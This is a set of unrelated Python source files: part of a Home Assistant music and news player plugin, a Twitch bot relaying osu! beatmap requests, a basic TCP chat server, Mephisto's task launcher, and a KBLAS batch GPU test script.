"id": item['sid'],
"name": item['title'],
"album": item['catalog_name'],
"image": item['source_icon'],
"duration": item['duration'],
"url": item['audio'],
"song": item['title'],
"singer": item['source']
}, _list)
return list(_newlist)
return None
async def play_news(self, name):
hass = self.hass
leting_headers = {"uid":UID, "logid": UID, "token": ''}
connector = aiohttp.TCPConnector(verify_ssl=False)
async with aiohttp.ClientSession(connector=connector) as session:
async with session.get('https://app.leting.io/app/auth?uid=' + UID \
+ '&appid=a435325b8662a4098f615a7d067fe7b8&ts=1628297581496&sign=4149682cf40c2bf2efcec8155c48b627&v=v9&channel=huawei', headers=leting_headers) as res:
r = await res.json()
# print(r)
leting_headers['token'] = r['data']['token']
_newlist = []
# 热点
_list = await self._get_news(session, leting_headers, 'f3f5a6d2-5557-4555-be8e-1da281f97c22')
if _list is not None:
_newlist.extend(_list)
# 社会
_list = await self._get_news(session, leting_headers, 'd8e89746-1e66-47ad-8998-1a41ada3beee')
if _list is not None:
_newlist.extend(_list)
# 国际
_list = await self._get_news(session, leting_headers, '4905d954-5a85-494a-bd8c-7bc3e1563299')
if _list is not None:
_newlist.extend(_list)
# 国内
_list = await self._get_news(session, leting_headers, 'fc583bff-e803-44b6-873a-50743ce7a1e9')
if _list is not None:
_newlist.extend(_list)
# 科技
_list = await self._get_news(session, leting_headers, 'f5cff467-2d78-4656-9b72-8e064c373874')
if _list is not None:
_newlist.extend(_list)
'''
热点:f3f5a6d2-5557-4555-be8e-1da281f97c22
社会:d8e89746-1e66-47ad-8998-1a41ada3beee
国际:4905d954-5a85-494a-bd8c-7bc3e1563299
国内:fc583bff-e803-44b6-873a-50743ce7a1e9
体育:c7467c00-463d-4c93-b999-7bbfc86ec2d4
娱乐:75564ed6-7b68-4922-b65b-859ea552422c
财经:c6bc8af2-e1cc-4877-ac26-bac1e15e0aa9
科技:f5cff467-2d78-4656-9b72-8e064c373874
军事:ba89c581-7b16-4d25-a7ce-847a04bc9d91
生活:40f31d9d-8af8-4b28-a773-2e8837924e2e
教育:0dee077c-4956-41d3-878f-f2ab264dc379
汽车:5c930af2-5c8a-4a12-9561-82c5e1c41e48
人文:f463180f-7a49-415e-b884-c6832ba876f0
旅游:8cae0497-4878-4de9-b3fe-30518e2b6a9f
北京市:29d6168ed172c09fc81d2d71d4ec0686
'''
# 调用服务,执行播放
await self.media.play_media('music_playlist', _newlist)
###################### 播放新闻 ######################
###################### 播放广播 ######################
async def play_fm(self, name):
hass = self.hass
connector = aiohttp.TCPConnector(verify_ssl=False)
async with aiohttp.ClientSession(connector=connector) as session:
async with session.get('https://search.qingting.fm/v3/search?categoryid=0&k=' + name + '&page=1&pagesize=15&include=all') as res:
r = await res.json()
docs = r['data']['data']['docs']
if isinstance(docs, list):
# 过滤直播
filter_list = list(filter(lambda item: item['type'] == 'channel_live', docs))
if len(filter_list) == 0:
return None
# print(filter_list)
# 整理格式
_newlist = map(lambda item: {
"id": item['id'],
"name": item['title'],
"album": item['category_name'],
"image": item['cover'],
"duration": 0,
"url": 'http://lhttp.qingting.fm/live/' + str(item['id']) + '/64k.mp3',
"song": item['title'],
"singer": '蜻蜓FM'
}, filter_list)
# 调用服务,执行播放
await self.media.play_media('music_playlist', list(_newlist))
###################### 缓存到本地音乐库 ######################
async def cache_file(self, url, file_name):
hass = self.hass
path = hass.config.path("media/ha_cloud_music")
# 替换文件名特殊字符为下划线
rstr = r"[\/\\\:\*\?\"\<\>\|]"
name = re.sub(rstr, "_", file_name)
file_path = os.path.join(path, name + '.mp3')
print('【缓存文件】' + file_path)
thread = threading.Thread(target=urllib.request.urlretrieve, args=(url, file_path))
thread.start()
###################### 获取本地音乐库 ######################
def get_local_media_list(self, search_type):
file_path = ''
singer = "默认列表"
if search_type != 'library_music':
file_path = search_type.replace('library_', '')
singer = file_path
hass = self.hass
children = []
base_url = get_url(hass).strip('/')
path = hass.config.path("media/ha_cloud_music")
file_path = file_path.replace('library_', '')
# 获取所有文件
file_dir = os.path.join(path, file_path)
for filename in os.listdir(file_dir):
if os.path.isfile(os.path.join(file_dir, filename)) and '.mp3' in filename:
songid = f"{base_url}/media-local/"
if file_path != '':
songid += urllib.parse.quote(f"{file_path}/{filename}")
else:
songid += urllib.parse.quote(filename)
song = filename.replace('.mp3', '')
children.append({
"name": song,
"song": song,
"singer": singer,
"album": "媒体库",
"image": f"{base_url}/static/icons/favicon-192x192.png",
"type": "url",
"url": songid
})
return children
|
twitch_bot.py | import datetime
import logging
import os
import time
from abc import ABC
from threading import Thread
from typing import AnyStr, Tuple, Union, List
import aiohttp
from twitchio import Message, Channel, Chatter
from twitchio.ext import commands, routines
from bots.irc_bot import IrcBot
from helpers.beatmap_link_parser import parse_beatmap_link
from helpers.database_helper import UserDatabase, StatisticsDatabase
from helpers.osu_api_helper import OsuApi
from helpers.utils import convert_seconds_to_readable
logger = logging.getLogger('ronnia')
class TwitchBot(commands.Bot, ABC):
PER_REQUEST_COOLDOWN = 30 # each request has 30 seconds cooldown
BEATMAP_STATUS_DICT = {"0": 'Pending',
"1": 'Ranked',
"2": 'Approved',
"3": 'Qualified',
"4": 'Loved',
"-1": 'WIP',
"-2": 'Graveyard'}
def __init__(self, initial_channel_ids: List[int]):
self.users_db = UserDatabase()
self.messages_db = StatisticsDatabase()
self.initial_channel_ids = initial_channel_ids
self.all_user_details = []
args = {
'token': os.getenv('TMI_TOKEN'),
'client_id': os.getenv('CLIENT_ID'),
'client_secret': os.getenv('CLIENT_SECRET'),
'prefix': os.getenv('BOT_PREFIX')
}
super().__init__(**args)
self.main_prefix = None
self.osu_api = OsuApi(self.messages_db)
self.user_last_request = {}
self.irc_bot = IrcBot("#osu", os.getenv('OSU_USERNAME'), "irc.ppy.sh", password=os.getenv("IRC_PASSWORD"))
self.irc_bot_thread = Thread(target=self.irc_bot.start)
self.join_channels_first_time = True
@staticmethod
async def _get_access_token():
client_id = os.getenv('CLIENT_ID'),
client_secret = os.getenv('CLIENT_SECRET')
grant_type = 'client_credentials'
scope = 'chat:read chat:edit'
payload = {'client_id': client_id,
'client_secret': client_secret,
'grant_type': grant_type,
'scope': scope}
async with aiohttp.ClientSession() as session:
async with session.post('https://id.twitch.tv/oauth2/token', data=payload) as resp:
response_json = await resp.json()
return response_json['access_token']
async def event_message(self, message: Message):
if message.author is None:
return
await self.handle_commands(message)
try:
await self.check_channel_enabled(message.channel.name)
await self.handle_request(message)
except AssertionError as e:
logger.debug(f'Check unsuccessful: {e}')
await self.messages_db.add_error('internal_check', str(e))
async def handle_request(self, message: Message):
logger.info(f"{message.channel.name} - {message.author.name}: {message.content}")
given_mods, api_params = self._check_message_contains_beatmap_link(message)
if given_mods is not None:
await self._check_user_cooldown(message.author)
beatmap_info = await self.osu_api.get_beatmap_info(api_params)
if beatmap_info:
await self.check_request_criteria(message, beatmap_info)
await self._update_channel(message)
# If user has enabled echo setting, send twitch chat a message
if await self.users_db.get_echo_status(twitch_username=message.channel.name):
await self._send_twitch_message(message, beatmap_info)
await self._send_irc_message(message, beatmap_info, given_mods)
await self.messages_db.add_request(requested_beatmap_id=int(beatmap_info['beatmap_id']),
requested_channel_name=message.channel.name,
requester_channel_name=message.author.name,
mods=given_mods)
async def inform_user_on_updates(self, osu_username: str, twitch_username: str, is_updated: bool):
if not is_updated:
message_txt_path = os.path.join(os.getenv('DB_DIR'), 'update_message.txt')
if os.path.exists(message_txt_path):
with open(message_txt_path) as f:
update_message = f.read().strip()
self.irc_bot.send_message(osu_username, update_message)
else:
logger.warning(f'Looking for {message_txt_path}, but it does not exist!')
await self.users_db.set_channel_updated(twitch_username)
return
async def check_beatmap_star_rating(self, message: Message, beatmap_info):
twitch_username = message.channel.name
requester_name = message.author.name
diff_rating = float(beatmap_info['difficultyrating'])
range_low, range_high = await self.users_db.get_range_setting(twitch_username=twitch_username, setting_key='sr')
if range_low == -1 or range_high == -1:
return
assert range_low < diff_rating < range_high, \
f'@{requester_name} Streamer is accepting requests between {range_low:.1f}-{range_high:.1f}* difficulty.' \
f' Your map is {diff_rating:.1f}*.'
return
async def check_request_criteria(self, message: Message, beatmap_info: dict):
test_status = await self.users_db.get_test_status(message.channel.name)
if not test_status:
await self.check_sub_only_mode(message)
await self.check_cp_only_mode(message)
await self.check_user_excluded(message)
await self.check_if_author_is_broadcaster(message)
await self.check_if_streaming_osu(message.channel)
try:
await self.check_beatmap_star_rating(message, beatmap_info)
except AssertionError as e:
await message.channel.send(str(e))
raise AssertionError
async def check_user_excluded(self, message: Message):
excluded_users = await self.users_db.get_excluded_users(twitch_username=message.channel.name, return_mode='list')
assert message.author.name.lower() not in excluded_users, f'{message.author.name} is excluded'
async def check_sub_only_mode(self, message: Message):
is_sub_only = await self.users_db.get_setting('sub-only', message.channel.name)
if is_sub_only:
assert message.author.is_mod or message.author.is_subscriber != '0' or 'vip' in message.author.badges, \
'Subscriber only request mode is active.'
async def check_cp_only_mode(self, message):
is_cp_only = await self.users_db.get_setting('cp-only', message.channel.name)
if is_cp_only:
assert 'custom-reward-id' in message.tags, 'Channel Points only mode is active.'
return
async def event_command_error(self, ctx, error):
logger.error(error)
await self.messages_db.add_error(error_type='twitch_command_error', error_text=str(error))
pass
async def _update_channel(self, message: Message):
"""
Updates the user about news
"""
logger.info('Updating user with the latest news!')
# Get current channel details from db
channel_details = await self.users_db.get_user_from_twitch_username(twitch_username=message.channel.name)
twitch_username = channel_details['twitch_username']
is_channel_updated = channel_details['enabled']
await self.inform_user_on_updates(channel_details['osu_username'], twitch_username, is_channel_updated)
return
async def get_osu_and_twitch_details(self, osu_user_id_or_name, twitch_user_id=None, twitch_username=None):
assert twitch_user_id is not None or twitch_username is not None, \
'Twitch user id or twitch username must be given.'
if osu_user_id_or_name.isdigit():
# Handle ids in the string form
osu_user_id_or_name = int(osu_user_id_or_name)
# Get osu! username from osu! api (usernames can change)
osu_user_info = await self.osu_api.get_user_info(osu_user_id_or_name)
# Get twitch username from twitch api
if twitch_user_id is None:
twitch_info = await self.fetch_users(names=[twitch_username])
else:
twitch_info = await self.fetch_users(ids=[twitch_user_id])
return osu_user_info, twitch_info
@staticmethod
async def check_if_author_is_broadcaster(message: Message):
assert message.author.name != message.channel.name, 'Author is broadcaster and not in test mode.'
return
async def global_before_hook(self, ctx):
"""
Global hook that runs before every command.
:param ctx: Message context
:return:
"""
user = await self.users_db.get_user_from_twitch_username(ctx.author.name)
assert user is not None, 'User does not exist'
assert ctx.message.channel.name == ctx.author.name, 'Message is not in author\'s channel'
async def check_if_streaming_osu(self, channel: Channel):
"""
Checks if stream is on and they're playing osu!, otherwise ignores channel.
:param channel: Channel of the message
:return:
"""
stream_list = await self.fetch_streams(user_logins=[channel.name])
assert len(stream_list) == 1, f'{channel.name} stream is not on.'
stream = stream_list[0]
assert stream.game_name == 'osu!', f'{channel.name} stream is not playing osu!'
return
async def check_channel_enabled(self, channel_name):
enabled = await self.users_db.get_enabled_status(twitch_username=channel_name)
assert enabled, f'Channel:{channel_name} is not open for requests'
async def _check_user_cooldown(self, author: Chatter):
"""
Check if user is on cooldown, raise an exception if the user is on request cooldown.
:param author: Twitch user object
:return: Exception if user has requested a beatmap before TwitchBot.PER_REQUEST_COOLDOWN seconds passed.
"""
author_id = author.id
time_right_now = datetime.datetime.now()
await self._prune_cooldowns(time_right_now)
if author_id not in self.user_last_request:
self.user_last_request[author_id] = time_right_now
else:
last_message_time = self.user_last_request[author_id]
seconds_since_last_request = (time_right_now - last_message_time).total_seconds()
assert seconds_since_last_request >= TwitchBot.PER_REQUEST_COOLDOWN, \
f'{author.name} is on cooldown.'
self.user_last_request[author_id] = time_right_now
return
async def _prune_cooldowns(self, time_right_now: datetime.datetime):
"""
Prunes users on that are on cooldown list so it doesn't get too cluttered.
:param time_right_now:
:return:
"""
pop_list = []
for user_id, last_message_time in self.user_last_request.items():
seconds_since_last_request = (time_right_now - last_message_time).total_seconds()
if seconds_since_last_request >= TwitchBot.PER_REQUEST_COOLDOWN:
pop_list.append(user_id)
for user in pop_list:
self.user_last_request.pop(user)
return
async def _send_irc_message(self, message: Message, beatmap_info: dict, given_mods: str):
"""
Sends the beatmap request message to osu!irc bot
:param message: Twitch Message object
:param beatmap_info: Dictionary containing beatmap information from osu! api
:param given_mods: String of mods if they are requested, empty string instead
:return:
"""
irc_message = await self._prepare_irc_message(message, beatmap_info, given_mods)
irc_target_channel = (await self.users_db.get_user_from_twitch_username(message.channel.name))['osu_username']
self.irc_bot.send_message(irc_target_channel, irc_message)
return
@staticmethod
async def _send_twitch_message(message: Message, beatmap_info: dict):
"""
Sends twitch feedback message
:param message: Twitch Message object
:param beatmap_info: Dictionary containing beatmap information from osu! api
:return:
"""
artist = beatmap_info['artist']
title = beatmap_info['title']
version = beatmap_info['version']
bmap_info_text = f"{artist} - {title} [{version}]"
await message.channel.send(f"{bmap_info_text} - Request sent!")
return
@staticmethod
def _check_message_contains_beatmap_link(message: Message) -> Tuple[Union[AnyStr, None], Union[dict, None]]:
"""
Splits message by space character and checks for possible beatmap links
:param message: Twitch Message object
:return:
"""
logger.debug("Checking if message contains beatmap link")
content = message.content
for candidate_link in content.split(' '):
result, mods = parse_beatmap_link(candidate_link, content)
if result:
logger.debug(f"Found beatmap id: {result}")
return mods, result
else:
logger.debug("Couldn't find beatmap in message")
return None, None
async def _prepare_irc_message(self, message: Message, beatmap_info: dict, given_mods: str):
"""
Prepare beatmap request message to send to osu!irc.
:param message: Twitch message
:param beatmap_info: Beatmap info taken from osu!api as dictionary
:param given_mods: Mods as string
:return:
"""
artist = beatmap_info['artist']
title = beatmap_info['title']
version = beatmap_info['version']
bpm = beatmap_info['bpm']
beatmap_status = self.BEATMAP_STATUS_DICT[beatmap_info['approved']]
difficultyrating = float(beatmap_info['difficultyrating'])
beatmap_id = beatmap_info['beatmap_id']
beatmap_length = convert_seconds_to_readable(beatmap_info['hit_length'])
beatmap_info = f"[http://osu.ppy.sh/b/{beatmap_id} {artist} - {title} [{version}]] ({bpm} BPM, {difficultyrating:.2f}*, {beatmap_length}) {given_mods}"
extra_postfix = ""
extra_prefix = ""
# TODO: Check if this issue is fixed in next twitchio
try:
badges = message.author.badges
except ValueError:
badges = []
if message.author.is_mod:
extra_prefix += "[MOD] "
elif message.author.is_subscriber != '0':
# TODO: Check if this conditional changed in the next releases of tio
extra_prefix += "[SUB] "
elif 'vip' in badges:
extra_prefix += "[VIP] "
if 'custom-reward-id' in message.tags:
extra_postfix += "+ USED POINTS"
return f"{extra_prefix}{message.author.name} -> [{beatmap_status}] {beatmap_info} {extra_postfix}"
async def event_ready(self):
self.main_prefix = self._prefix
await self.users_db.initialize()
await self.messages_db.initialize()
logger.info(f'Successfully initialized databases!')
# TODO: Fix here
# self.all_user_details = await self.users_db.get_all_users()
# self.initial_channel_ids = [user['twitch_id'] for user in self.all_user_details]
logger.debug(f'Populating users: {self.initial_channel_ids}')
# Get channel names from ids
list_batcher = lambda sample_list, chunk_size: [sample_list[i:i + chunk_size] for i in
range(0, len(sample_list), chunk_size)]
channel_names = []
for batch in list_batcher(self.initial_channel_ids, 100):
channel_names.extend(await self.fetch_users(ids=batch))
channels_to_join = [ch.name for ch in channel_names]
if self.nick not in channels_to_join:
channels_to_join.append(self.nick)
logger.debug(f'Joining channels: {channels_to_join}')
# Join channels
channel_join_start = time.time()
await self.join_channels(channels_to_join)
logger.debug(f'Joined all channels after {time.time() - channel_join_start:.2f}s')
# Start update users routine
self.update_users.start()
self.join_channels_routine.start()
initial_extensions = ['cogs.request_cog', 'cogs.admin_cog']
for extension in initial_extensions:
self.load_module(extension)
logger.debug(f'Successfully loaded: {extension}')
logger.info(f'Ready | {self.nick}')
@routines.routine(hours=1)
async def update_users(self):
logger.info('Started updating user routine')
user_details = await self.users_db.get_all_users()
channel_ids = [ch['twitch_id'] for ch in user_details]
channel_details = await self.fetch_users(ids=channel_ids)
# Remove banned twitch users from database
if len(user_details) != len(channel_details):
logger.warning('There\'s a banned user.')
logger.info(f'Users in database vs from twitch api: {len(user_details)} - {len(channel_details)}.')
banned_users = set([user['twitch_id'] for user in user_details]).difference(
set([str(user.id) for user in channel_details]))
logger.info(f'Banned user ids: {banned_users}')
new_user_details = []
for user in user_details:
if user['twitch_id'] in banned_users:
await self.users_db.remove_user(user['twitch_username'])
else:
new_user_details.append(user)
user_details = new_user_details.copy()
user_details.sort(key=lambda x: int(x['twitch_id']))
channel_details.sort(key=lambda x: x.id)
for db_user, new_twitch_user in zip(user_details, channel_details):
try:
osu_details = await self.osu_api.get_user_info(db_user['osu_username'])
except aiohttp.ClientError as client_error:
logger.error(client_error)
osu_details = {'user_id': db_user['osu_id'],
'username': db_user['osu_username']}
# Remove banned osu! users from database
if osu_details is None:
await self.users_db.remove_user(twitch_username=db_user['twitch_username'])
continue
new_twitch_username = new_twitch_user.name.lower()
new_osu_username = osu_details['username'].lower().replace(' ', '_')
twitch_id = new_twitch_user.id
osu_user_id = osu_details['user_id']
if new_osu_username != db_user['osu_username'] or new_twitch_username != db_user['twitch_username']:
logger.info(f'Username change:')
logger.info(f'osu! old: {db_user["osu_username"]} - new: {new_osu_username}')
logger.info(f'Twitch old: {db_user["twitch_username"]} - new: {new_twitch_username}')
await self.users_db.update_user(new_twitch_username=new_twitch_username,
new_osu_username=new_osu_username,
twitch_id=twitch_id,
osu_user_id=osu_user_id)
@routines.routine(hours=1)
async def join_channels_routine(self):
logger.debug('Started join channels routine')
if self.join_channels_first_time:
self.join_channels_first_time = False
return
all_user_details = await self.users_db.get_all_users()
twitch_users = [user['twitch_username'] for user in all_user_details]
logger.debug(f'Joining: {twitch_users}')
await self.join_channels(twitch_users)
async def close(self):
logger.info('Closing bot')
self.update_users.cancel()
self.join_channels_routine.cancel()
await self.users_db.close()
await self.messages_db.close()
self._connection._keeper.cancel()
self._connection.is_ready.clear()
futures = self._connection._fetch_futures()
for fut in futures:
fut.cancel()
if self._connection._websocket:
await self._connection._websocket.close()
if self._connection._client._http.session:
await self._connection._client._http.session.close()
self._connection._loop.stop()
|
server.py | import sys
import os
from datetime import datetime
from threading import Thread
from socket import socket, AF_INET, SOCK_STREAM
# invalid arguments
if len(sys.argv) < 2:
print("Invalid inputs. Please stick to the format shown below.")
print("$ python3 client.py <portnumber>")
print("portnumber: the port of the chatroom server.")
sys.exit(0)
# define server address
server_name = "127.0.0.1"
server_port = int(sys.argv[1])
# create a new TCP socket and bind it to server address
server_socket = socket(AF_INET, SOCK_STREAM)
server_socket.bind((server_name, server_port))
# start listening on the bound port
server_socket.listen(1)
print(f"TCP server is listening on port {server_port}.")
peers = []
def newUser(conn_socket: socket):
name: str = conn_socket.recv(1024).decode()
# alert peers about new connection
for peer in peers:
if peer != conn_socket:
peer.send(f"{name} has joined the chat\n".encode())
while True:
# receive the message and broadcast it in the network
msg: str = conn_socket.recv(1024).decode()
time = datetime.now().strftime("%H:%M:%S")
# broadcast the data to all peers in the network
for peer in peers:
if peer != conn_socket:
timed_msg = f"[{time}] {name}\n" + msg
peer.send(timed_msg.encode())
# terminate server-side connection with user
if msg == "bye\n":
peers.remove(conn_socket)
conn_socket.close()
return
while True:
try:
# a new client request received on server_port
# once accepted, a random port is assigned for further communication
conn_socket, _ = server_socket.accept()
peers.append(conn_socket)
# create a thread and start its execution
Thread(target=newUser, args=(conn_socket,)).start()
except KeyboardInterrupt:
# alert clients to close their connection
for peer in peers:
peer.send("__SERVER_ERROR__".encode())
server_socket.close()
print("Server has stopped listening.")
# current process is stopped, any spawned threads are also killed
os._exit(0)
|
task_launcher.py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# TODO(#99) do we standardize some kinds of data loader formats? perhaps
# one that loads from files, and then an arbitrary kind? Simple
# interface could be like an iterator. This class will launch tasks
# as if the loader is an iterator.
from mephisto.data_model.assignment import (
Assignment,
InitializationData,
AssignmentState,
)
from mephisto.data_model.unit import Unit
from typing import Dict, Optional, List, Any, TYPE_CHECKING, Iterator
from tqdm import tqdm
import os
import time
import enum
if TYPE_CHECKING:
from mephisto.data_model.task_run import TaskRun
from mephisto.abstractions.database import MephistoDB
import threading
from mephisto.operations.logger_core import get_logger
import types
logger = get_logger(name=__name__)
UNIT_GENERATOR_WAIT_SECONDS = 10
ASSIGNMENT_GENERATOR_WAIT_SECONDS = 0.5
class GeneratorType(enum.Enum):
NONE = 0
UNIT = 1
ASSIGNMENT = 2
class TaskLauncher:
"""
This class is responsible for managing the process of registering
and launching units, including the steps for pre-processing
data and storing them locally for assignments when appropriate.
"""
def __init__(
self,
db: "MephistoDB",
task_run: "TaskRun",
assignment_data_iterator: Iterator[InitializationData],
max_num_concurrent_units: int = 0,
):
"""Prepare the task launcher to get it ready to launch the assignments"""
self.db = db
self.task_run = task_run
self.assignment_data_iterable = assignment_data_iterator
self.assignments: List[Assignment] = []
self.units: List[Unit] = []
self.provider_type = task_run.get_provider().PROVIDER_TYPE
self.max_num_concurrent_units = max_num_concurrent_units
self.launched_units: Dict[str, Unit] = {}
self.unlaunched_units: Dict[str, Unit] = {}
self.keep_launching_units: bool = False
self.finished_generators: bool = False
self.assignment_thread_done: bool = True
self.unlaunched_units_access_condition = threading.Condition()
if isinstance(self.assignment_data_iterable, types.GeneratorType):
self.generator_type = GeneratorType.ASSIGNMENT
self.assignment_thread_done = False
elif max_num_concurrent_units != 0:
self.generator_type = GeneratorType.UNIT
else:
self.generator_type = GeneratorType.NONE
run_dir = task_run.get_run_dir()
os.makedirs(run_dir, exist_ok=True)
logger.debug(f"type of assignment data: {type(self.assignment_data_iterable)}")
self.units_thread = None
self.assignments_thread = None
def _create_single_assignment(self, assignment_data) -> None:
"""Create a single assignment in the database using its read assignment_data"""
task_run = self.task_run
task_config = task_run.get_task_config()
assignment_id = self.db.new_assignment(
task_run.task_id,
task_run.db_id,
task_run.requester_id,
task_run.task_type,
task_run.provider_type,
task_run.sandbox,
)
assignment = Assignment(self.db, assignment_id)
assignment.write_assignment_data(assignment_data)
self.assignments.append(assignment)
unit_count = len(assignment_data.unit_data)
for unit_idx in range(unit_count):
unit_id = self.db.new_unit(
task_run.task_id,
task_run.db_id,
task_run.requester_id,
assignment_id,
unit_idx,
task_config.task_reward,
task_run.provider_type,
task_run.task_type,
task_run.sandbox,
)
self.units.append(Unit(self.db, unit_id))
with self.unlaunched_units_access_condition:
self.unlaunched_units[unit_id] = Unit(self.db, unit_id)
def _try_generating_assignments(self) -> None:
"""Try to generate more assignments from the assignments_data_iterator"""
while not self.finished_generators:
try:
data = next(self.assignment_data_iterable)
self._create_single_assignment(data)
except StopIteration:
self.assignment_thread_done = True
time.sleep(ASSIGNMENT_GENERATOR_WAIT_SECONDS)
def create_assignments(self) -> None:
"""Create an assignment and associated units for the generated assignment data"""
self.keep_launching_units = True
if self.generator_type != GeneratorType.ASSIGNMENT:
for data in self.assignment_data_iterable:
self._create_single_assignment(data)
else:
self.assignments_thread = threading.Thread(
target=self._try_generating_assignments,
args=(),
name="assignment-generator",
)
self.assignments_thread.start()
def generate_units(self):
"""units generator which checks that only 'max_num_concurrent_units' running at the same time,
i.e. in the LAUNCHED or ASSIGNED states"""
while self.keep_launching_units:
units_id_to_remove = []
for db_id, unit in self.launched_units.items():
status = unit.get_status()
if (
status != AssignmentState.LAUNCHED
and status != AssignmentState.ASSIGNED
):
units_id_to_remove.append(db_id)
for db_id in units_id_to_remove:
self.launched_units.pop(db_id)
num_avail_units = self.max_num_concurrent_units - len(self.launched_units)
num_avail_units = (
len(self.unlaunched_units)
if self.max_num_concurrent_units == 0
else num_avail_units
)
units_id_to_remove = []
for i, item in enumerate(self.unlaunched_units.items()):
db_id, unit = item
if i < num_avail_units:
self.launched_units[unit.db_id] = unit
units_id_to_remove.append(db_id)
yield unit
else:
break
with self.unlaunched_units_access_condition:
for db_id in units_id_to_remove:
self.unlaunched_units.pop(db_id)
time.sleep(UNIT_GENERATOR_WAIT_SECONDS)
if not self.unlaunched_units:
break
def _launch_limited_units(self, url: str) -> None:
"""use units' generator to launch limited number of units according to (max_num_concurrent_units)"""
# Continue launching if we haven't pulled the plug, so long as there are currently
# units to launch, or more may come in the future.
while not self.finished_generators and (
len(self.unlaunched_units) > 0 or not self.assignment_thread_done
):
for unit in self.generate_units():
if unit is None:
break
unit.launch(url)
if self.generator_type == GeneratorType.NONE:
break
self.finished_generators = True
def launch_units(self, url: str) -> None:
"""launch any units registered by this TaskLauncher"""
self.units_thread = threading.Thread(
target=self._launch_limited_units, args=(url,), name="unit-generator"
)
self.units_thread.start()
def get_assignments_are_all_created(self) -> bool:
return self.assignment_thread_done
def expire_units(self) -> None:
"""Clean up all units on this TaskLauncher"""
self.keep_launching_units = False
self.finished_generators = True
for unit in tqdm(self.units):
try:
unit.expire()
except Exception as e:
logger.exception(
f"Warning: failed to expire unit {unit.db_id}. Stated error: {e}",
exc_info=True,
)
def shutdown(self) -> None:
"""Clean up running threads for generating assignments and units"""
self.assignment_thread_done = True
self.keep_launching_units = False
self.finished_generators = True
if self.assignments_thread is not None:
self.assignments_thread.join()
self.units_thread.join()
|
kblas-test-batch-parallel.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import os, sys, getopt
import csv
import time
import commands
import threading
# create output log folder
KBLAS_HOME='.'
TEST_LOGS_PATH='kblas-test-log'
cmd = ('cd '+KBLAS_HOME+'; mkdir -p '+TEST_LOGS_PATH)
print cmd
sys.stdout.flush()
os.system(cmd)
BIN_PATH='./testing/bin/'
if (not os.path.isdir(BIN_PATH)):
print 'Unable to find executables folder! Exiting'
exit()
#detect GPU devices
NGPUS=0
# first check using environment variable
if ( "CUDA_VISIBLE_DEVICES" in os.environ ):
aux=os.environ["CUDA_VISIBLE_DEVICES"].strip(',')
if ( len(aux) > 0):
NGPUS=int( aux.count(',') ) + 1
if ( NGPUS == 0 ):
# check using system
cmd=('nvidia-smi -L | wc -l')
NGPUS = int(commands.getstatusoutput(cmd)[1])
if (NGPUS < 1):
print 'Unable to detect an NVIDIA GPU device to test on! Exiting'
exit()
print 'NGPUS: ' + str(NGPUS)
#set options
#check = ''
check = ' -c'
defaultBatchCount = 100
TEST_BATCH_SVD = 1
TEST_BATCH_QR = 1
TEST_BATCH_QR_V = 1
TEST_BATCH_GEQP = 1
TEST_BATCH_TRSM = 1
TEST_BATCH_TRMM = 1
TEST_BATCH_GEMM = 1
TEST_BATCH_SYRK = 1
TEST_BATCH_POTRF = 1
TEST_BATCH_LAUUM = 1
TEST_BATCH_TRTRI = 1
TEST_BATCH_POTRS = 1
TEST_BATCH_POTRI = 1
TEST_BATCH_POTI = 1
TEST_BATCH_POSV = 1
TEST_BATCH_ARA = 1
#--------------------------------
def task1(pVariants, pRanges, pExec, pOptions, pBatchCount, pDev, pOutfile):
print 'running: '+pExec+' ... '
os.system('echo running: '+pExec+' > '+pOutfile)
for v in pVariants:
for r in pRanges:
cmd = (pExec+' '+ r + ' ' + pOptions + ' --dev ' + str(pDev) + ' ' + v + ' --batchCount ' + str(pBatchCount))
os.system('echo >> '+pOutfile)
os.system('echo '+cmd+' >> '+pOutfile)
sys.stdout.flush()
os.system(cmd+' >> '+pOutfile)
time.sleep(1)
print pExec+' done'
#--------------------------------
def launchQueue(*taskQueue):
for t in taskQueue:
t.start()
t.join()
#--------------------------------
def parallelTaskLaunch(variants, programs, ranges, options, batchCount):
deviceQueue = [[] for _ in xrange(NGPUS)]
deviceThread = []
dev = 0
for p in programs:
pp = BIN_PATH+p
if (not os.path.isfile(pp)):
print 'Unable to find '+pp+' executable! Skipping...'
else:
logFile = TEST_LOGS_PATH+'/'+p+'.txt'
deviceQueue[dev].append( threading.Thread(target=task1, args=(variants, ranges, pp, options, batchCount, dev, logFile)) )
dev = (dev+1)%NGPUS
dev = 0
while dev < NGPUS:
q = deviceQueue[dev]
#print q
tq = threading.Thread( target=launchQueue, args=(q) )
deviceThread.append(tq)
tq.start()
dev = dev + 1
dev = 0
while dev < NGPUS:
tq = deviceThread[dev]
tq.join()
dev = dev + 1
############### BATCH_SVD
if (TEST_BATCH_SVD == 1):
variants = ['']
programs = ['test_dgesvj_batch', 'test_sgesvj_batch']
ranges = ['--range 32:512:32']
options = ''
batchCount = defaultBatchCount;
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_QR
if (TEST_BATCH_QR == 1):
variants = ['']
programs = ['test_dgeqrf_batch', 'test_sgeqrf_batch']
ranges = ['--range 32:512:32']
batchCount = defaultBatchCount;
options = ''
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_QR_V
if (TEST_BATCH_QR_V == 1):
variants = ['']
programs = ['test_dtsqrt_vbatch', 'test_stsqrt_vbatch']
ranges = ['--range 32:256:32']
batchCount = defaultBatchCount;
options = ''
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_GEQP
if (TEST_BATCH_GEQP == 1):
variants = ['']
programs = ['test_dgeqp2_batch', 'test_sgeqp2_batch']
ranges = ['--range 32:256:32']
batchCount = defaultBatchCount;
options = ''
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_ARA
if (TEST_BATCH_ARA == 1):
variants = ['']
programs = ['test_dara_batch', 'test_sara_batch']
ranges = ['--range 64:256:32']
batchCount = defaultBatchCount;
options = ''
parallelTaskLaunch(variants, programs, ranges, options, batchCount)
############### BATCH_GEMM
if (TEST_BATCH_GEMM == 1):
variants = ['-NN',
'-TN',
'-NT',
'-TT',
]
programs = ['test_sgemm_batch',
'test_dgemm_batch',
'test_cgemm_batch',
'test_zgemm_batch'
]
ranges = [
'--range 2:70+1',
'--range 32:256:32'
]
options = check
batchCount = defaultBatchCount;
